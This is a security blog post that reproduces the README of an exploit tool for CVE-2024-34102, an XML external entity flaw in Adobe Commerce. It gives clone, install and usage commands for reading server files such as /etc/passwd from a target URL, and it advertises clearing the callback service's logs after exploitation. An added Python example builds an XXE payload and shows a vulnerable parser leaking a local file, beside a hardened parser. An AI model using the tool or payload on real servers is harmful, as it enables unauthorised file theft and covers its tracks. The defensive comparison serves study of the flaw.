API Security Blog

Exploit for Improper Restriction of XML External Entity Reference in Adobe Commerce

## CosmicSting CVE-2024-34102 Exploit

### Overview

CosmicSting is a Python script that exploits an XML External Entity (XXE) vulnerability in Adobe Commerce (CVE-2024-34102). The script demonstrates how an attacker can use XML-based requests to read sensitive files from the server; the same weakness could potentially be chained into arbitrary code execution.

### Features

- Exploits the XXE vulnerability by sending crafted XML requests.
- Generates a callback URL for hosting the external DTD file.
- Uses multi-threading for faster exploitation.
- Clears and removes the instance logs on the SSRF API after exploitation.

### Requirements

- Python 3.x
- Dependencies: `requests`, `click`, `fake_useragent`

### Installation

Clone the repository:

```bash
git clone https://github.com/bughuntar/CVE-2024-34102-Python
cd CVE-2024-34102-Python
```

Install the dependencies with pip:

```bash
pip install -r requirements.txt
chmod +x *
```

### Usage

Run the script with the required URL parameter and the optional file and thread parameters:

```bash
python cosmic_sting.py --url <target_url> [--file <file_to_read>] [-t <threads>]
```

Options:

- `-u`, `--url`: URL or domain to test for the vulnerability. Required.
- `-f`, `--file`: File to read from the server. Defaults to `/etc/passwd` when not given.
- `-t`, `--threads`: Number of concurrent threads to use. Defaults to 5.

### Example

Exploit a vulnerable URL, reading `/etc/hosts` with 10 threads:

```bash
python cosmic_sting.py --url https://example.com --file /etc/hosts -t 10
```
…
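The mechanism the script relies on, shown as an added example that is not code from the CosmicSting repository or from Adobe Commerce: an XML parser that resolves external general entities reads whatever the entity's SYSTEM identifier points at and inlines it into the document. Python's standard-library `xml.sax` parser is used here; the entity points at a constructed local file standing in for `/etc/passwd` so the example runs offline, but an `http(s)` URL, such as the callback-hosted DTD the script generates, would be fetched by the same resolver. The hardened variant leaves resolution off (the `xml.sax` default since Python 3.7.1) and additionally rejects any DOCTYPE, which an API that never expects a DTD should do. All function names and the sample secret are hypothetical.

```python
"""XXE demonstration: vulnerable parser beside its hardened form (added example)."""
import io
import os
import tempfile
import xml.sax
from xml.sax import handler


class _TextCollector(handler.ContentHandler):
    """Collects all character data the parser reports inside the root element."""

    def __init__(self):
        super().__init__()
        self._parts = []

    def characters(self, content):
        self._parts.append(content)

    def text(self):
        return "".join(self._parts)


def build_xxe_document(system_id):
    """Constructed request body: the internal DTD declares an external entity
    `xxe` whose SYSTEM identifier is a local path here, but could equally be an
    http(s) URL to an attacker-hosted DTD (the role of the script's callback URL)."""
    doc = (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [<!ENTITY xxe SYSTEM "{}">]>\n'
        "<data>&xxe;</data>"
    ).format(system_id)
    return doc.encode()


def has_doctype(xml_bytes):
    """Cheap pre-parse check an API gateway or WAF rule can apply."""
    return b"<!DOCTYPE" in xml_bytes


def _parse(xml_bytes, resolve_external_entities):
    parser = xml.sax.make_parser()
    # feature_external_ges decides whether &xxe; is fetched and inlined or skipped.
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text()


def parse_vulnerable(xml_bytes):
    """External entity resolution enabled: the entity's target is read from disk
    (or fetched over the network) and its contents become document text."""
    return _parse(xml_bytes, True)


def parse_hardened(xml_bytes):
    """Rejects DOCTYPE outright; even without that check, leaving resolution off
    (the xml.sax default) means the entity reference is skipped and nothing is read."""
    if has_doctype(xml_bytes):
        raise ValueError("DOCTYPE declaration rejected")
    return _parse(xml_bytes, False)


def demo():
    """Writes a constructed 'secret' file, parses the same payload three ways and
    returns what each exposed: leaked text, text with resolution off, and whether
    the hardened parser rejected the payload."""
    secret = "root:x:0:0:root:/root:/bin/bash\n"  # constructed stand-in for /etc/passwd
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret)
        path = f.name
    try:
        payload = build_xxe_document(path)
        leaked = parse_vulnerable(payload)
        skipped = _parse(payload, False)  # default parser: entity skipped, no file read
        try:
            parse_hardened(payload)
            rejected = False
        except ValueError:
            rejected = True
    finally:
        os.unlink(path)
    return {"leaked": leaked, "skipped": skipped, "rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

Run it and the `leaked` value is the full contents of the temporary file, while the default parser yields an empty string for the same payload; swapping the path for `/etc/passwd` reproduces the script's default read, and swapping it for a URL shows why the blind, out-of-band variant needs nothing more than a parser that fetches external entities.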
